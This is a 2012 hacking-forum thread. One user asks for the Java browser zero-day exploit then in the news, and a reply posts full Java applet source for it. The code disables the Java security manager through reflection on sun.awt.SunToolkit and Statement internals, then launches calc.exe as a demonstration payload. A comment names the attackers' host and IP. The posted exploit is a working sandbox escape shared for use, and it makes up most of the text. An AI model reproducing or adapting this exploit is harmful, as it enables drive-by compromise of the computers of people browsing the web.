Pages: [1]

Author Topic: Java Browser Exploitation  (Read 897 times)

0 Members and 1 Guest are viewing this topic.

L0rd_M@dness

  • Guest
Java Browser Exploitation
« on: August 30, 2012, 11:17:41 pm »
http://nakedsecurity.sophos.com/2012/08/28/unpatched-java-exploit-spreads-like-wildfire/
http://nakedsecurity.sophos.com/2012/08/30/zero-day-java-flaw-exploited-tax-email/
I know this is not news, but does anyone actually have the exploit, or some sort of tutorial over how to code the exploit?
Report to moderator   Logged

Offline peak

  • Serf
  • *
  • Posts: 26
  • Cookies: 0
    • View Profile
Re: Java Browser Exploitation
« Reply #1 on: August 30, 2012, 11:33:54 pm »
This should be it:

Code: [Select]

    //
    // CVE-2012-XXXX Java 0day
    //
    // reported here: [url]http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html[/url]
    //
    // secret host / ip : ok.aa24.net / 59.120.154.62
    //
    // regurgitated by jduck
    //
    // probably a metasploit module soon...
    //
    package cve2012xxxx;
     
    import java.applet.Applet;
    import java.awt.Graphics;
    import java.beans.Expression;
    import java.beans.Statement;
    import java.lang.reflect.Field;
    import java.net.URL;
    import java.security.*;
    import java.security.cert.Certificate;
     
    public class Gondvv extends Applet
    {
     
        public Gondvv()
        {
        }
     
        public void disableSecurity()
            throws Throwable
        {
            Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
            Permissions localPermissions = new Permissions();
            localPermissions.add(new AllPermission());
            ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
            AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
                localProtectionDomain
            });
            SetField(Statement.class, "acc", localStatement, localAccessControlContext);
            localStatement.execute();
        }
     
        private Class GetClass(String paramString)
            throws Throwable
        {
            Object arrayOfObject[] = new Object[1];
            arrayOfObject[0] = paramString;
            Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
            localExpression.execute();
            return (Class)localExpression.getValue();
        }
     
        private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
            throws Throwable
        {
            Object arrayOfObject[] = new Object[2];
            arrayOfObject[0] = paramClass;
            arrayOfObject[1] = paramString;
            Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
            localExpression.execute();
            ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
        }
     
        public void init()
        {
            try
            {
                disableSecurity();
                Process localProcess = null;
                localProcess = Runtime.getRuntime().exec("calc.exe");
                if(localProcess != null);
                   localProcess.waitFor();
            }
            catch(Throwable localThrowable)
            {
                localThrowable.printStackTrace();
            }
        }
     
        public void paint(Graphics paramGraphics)
        {
            paramGraphics.drawString("Loading", 50, 25);
        }
    }

« Last Edit: August 30, 2012, 11:34:56 pm by peak »
Report to moderator   Logged
Pages: [1]